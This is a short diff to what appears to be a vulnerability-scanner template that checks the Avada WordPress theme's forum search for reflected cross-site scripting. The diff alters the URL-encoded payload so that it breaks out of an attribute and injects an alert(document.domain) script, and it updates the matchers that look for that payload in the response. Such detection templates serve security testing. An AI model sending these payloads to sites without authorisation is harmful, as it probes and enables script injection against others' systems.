--- a/vulnerabilities/other/avada-xss.yaml
+++ b/vulnerabilities/other/avada-xss.yaml
@@ -13,15 +13,15 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/forums/search/z-->%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'
+      - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "</script><script>alert(document.domain)</script>"
-          - "avada-footer-scripts"
+          - '"></script><script>alert(document.domain)</script>'
+          - 'avada-footer-scripts'
         condition: and
 
       - type: word
